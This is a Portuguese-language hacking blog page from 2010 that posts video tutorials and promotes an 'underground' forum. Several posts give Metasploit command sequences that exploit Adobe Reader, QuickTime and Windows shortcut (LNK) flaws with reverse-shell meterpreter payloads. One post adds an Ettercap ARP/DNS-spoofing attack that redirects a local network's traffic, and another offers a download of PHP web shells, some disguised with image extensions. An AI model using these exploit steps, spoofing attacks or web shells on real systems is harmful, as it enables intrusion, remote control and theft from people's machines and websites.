banner468

segunda-feira, 20 de setembro de 2010

Blog do whit3_sh4rk (WeSk)



WeSk é uma espécie de blog que traz conteúdos sobre informática de forma dinâmica e descontraída. O objetivo é distribuir e adquirir conhecimento através de conteúdos desenvolvidos pelo próprio autor da página (whit3_sh4rk), pesquisas e através de contribuições dos leitores e parceiros.

A página contém textos sobre Windows/Windows Server, Linux, Programação, entre outros assuntos. Algumas ferramentas e em alguns casos seus respectivos códigos-fonte são distribuídos pelo autor da página. Algumas vídeo-aulas com os mais diversos assuntos (vulnerabilidades, pentest, programação, etc) são indicadas com os devidos créditos aos autores das mesmas.

Visite, participe e contribua!

http://www.wesk.info/wp/

Parceiro do Blog.

quinta-feira, 16 de setembro de 2010

Vulnerabilidade no Adobe Reader 9.3.4(0day)


Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores. Mas uma vez o Metasploit na frente de seus concorrentes... :P

Comandos:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler

Sobre o Vídeo: 
Formato:  AVI
Tamanho:  18.8 MB
Duração: 5:59 min
Musica:  Carl Orff - Carmina Burana - O Fortuna

Ref:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html

domingo, 12 de setembro de 2010

Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)


Nessa aula mostro como explorar a vulnerabilidade no QuickTime, essa vulnerabilidade e classificada de 0day e afeta todas as versões do QuickTime e do Windows. Ela foi descoberta pelo Investigador de segurança Ruben Santamarta.

Comandos:
use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST SeuIP
set SRVPORT 80
set URIPATH /
set payload windows/shell/reverse_tcp
set LHOST SeuIP
set LPORT 5050
exploit

Sobre o Vídeo:
Formato:  AVI
Tamanho: 8.2 MB
Duração: 3:57 min
Musica: Mantenha o Respeito - Marcelo D2 
Baixar: http://www.4shared.com/file/eKgQCHTr/0day-quicktime.html




Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1818
http://www.osvdb.org/67705
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1

Fórum Underground


O Fórum Underground é um espaço novo sobre assuntos avançados de informática, onde a admissão é restringido a critérios de seleção e de conhecimento na área de TI.
O fórum não se encontra aberto para consulta e leitura de artigos sem registo e aceitação por parte da atual Administração do mesmo.

Quem faz parte da nossa comunidade tem à sua disposição artigos avançados sobre segurança em redes, linguagem de programação, material de estudo e de apoio à universidade assim como um leque restrito de staff que ajudam os membros nas dúvidas que possam surgir.

Pretendemos ser um fórum de referência mundial e para isso tratamos dos nossos membros da melhor forma possível, projetando novas atividades de estudo e disponibilizando conteúdo que dificilmente vai encontrar eu outros fóruns, para isso funcionamos à porta fechada onde só os "bons" têm acesso às últimas novidade em tecnologia informática.

Atreve-te e faz parte da nossa equipa, pretendemos recrutar sempre os melhores técnicos e engenheiros para as fileiras do nosso fórum, de forma a estar no top.

Fórum: http://ssl.forum-underground.com/
Contato: http://ssl.forum-underground.com/forum/sendmessage.php
INEM (Admin): http://ssl.forum-underground.com/forum/member.php?1-INEM
Bhior: http://ssl.forum-underground.com/forum/member.php?9-Bhior

Parceiro do Blog.

SET + Metasploit - WebDAV DLL hijacker

Nessa aula mostro com explorar WebDAV DLL hijack usando o SET integrado com Metasploit.


Sobre o Vídeo:
Formato:  AVI
Tamanho: 12.5 MB
Duração: 3:12 min
Musica: Toca uma regueira aí - Armandinho

Baixar: http://www.4shared.com/file/X6cJru8-/SET-DLL_Hijacker.html

Ref:
http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt

sexta-feira, 10 de setembro de 2010

Reverse Egineering Brazil


Encontre dicas, artigos, ferramentas, desafios, e-books, unpacking, keygenning, vídeos tutorias e muito
mais coisas relacionadas a Engenharia Reversa, como também análise de malwares e programação voltada para RE.

Reverse Egineering Brazil é um novo conceito de um lugar sério para estudos sobre RE, juntos aprendemos
e juntos ensinamos, tudo que é necessário para se dar largada nesse mundo de RE.

Fórum: http://www.re-b.net/home/index.php
unn4 (Admin): http://www.re-b.net/home/memberlist.php?mode=viewprofile&u=2
Bhior: http://www.re-b.net/home/memberlist.php?mode=viewprofile&u=59

Parceiro do Blog.

quinta-feira, 9 de setembro de 2010

Metasploit - Mudando o Banner


Vídeo aula simples de como trocar o banner do metasploit, a aula foi feita a pedido de um usuario do blog. Qualquer duvida reporte abaixo.

Baixar: http://www.4shared.com/file/Yp_AdMBB/Mudando_banner.html




terça-feira, 7 de setembro de 2010

Vulnerabilidade de atalho do Windows - CVE-2010-2568 - Metasploit + Ettercap



Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.
Maiores informações em:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx

O que eu fiz?
Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo um MITM, e direcionando todo trafego da minha rede local para minha maquina.

Comandos:
use windows/browser/ms10_046_shortcut_icon_dllloader
set LHOST 192.168.1.4
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //

Sobre o Vídeo:
Formato: AVI
Tamanho: 12.6 MB
Duração: 4:45 min
Autor: Fabiano Matias aka Bhior
Musica:  Cachimbo da paz - Gabriel o Pensador
Baixar: http://www.4shared.com/file/MzP5k2eD/Windows_LNK_CVE-2010-2568.html

Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568
http://www.osvdb.org/66387
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx
http://adrenaline.com.br/seguranca/noticias/5616/criminosos-exploram-icones-de-atalhos-para-espalhar-malware.html

segunda-feira, 6 de setembro de 2010

Lanmap


O lanmap é um software que observa silenciosamente a rede e produz um mapa com os dados que obtém desta rede. O autor do software queria algo que demonstrasse claramente como as redes estavam configuradas. Obter estes dados com sniffers como o tcpdump não era prático, o que motivou-o a desenvolver o lanmap.

Ele “escuta” todo o tráfego disponível na rede, observa quais computadores estão comunicando-se com os outros, qual é o volume deste tráfego e quais protocolos estão sendo utilizados. A partir disto ele cria as imagens dos mapas destas redes.

Comandos:
lanmap -i eth0 -r 30 -T png -o /root/   # -i para interface de rede, -r criar uma imagem a cada 30 s, -T formato da imagem, /root/ diretório para armazenar a imagem criada.

Sobre o Vídeo
Tamanho: 7.3 MB
Formato: Avi (rar)
Duração:  2:28 min
Musica: Especial
Autor: Fabiano matias a.k.a Bhior
Baixar: http://www.4shared.com/file/E74NCXGr/_2__Lanmap.html



Ref: http://www.parseerror.com/lanmap/

quinta-feira, 2 de setembro de 2010

Shell script php

Alguns shell scripts em php, divirtam-se.

Nomes:
120667kk.php.pjpeg
420532Shell.php.pjpeg
629788tryag.php
681985c99.php
951078biJ.php
c99.php
joomla.php
mm.php
Mohajer22-perl.pl
O0O.php
perl.pl
sql.php
style.php
sym4.php
Team SQL.php
TrYaG.php
update.php

Baixar: http://www.4shared.com/file/uDgWw-cG/scripts.html

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers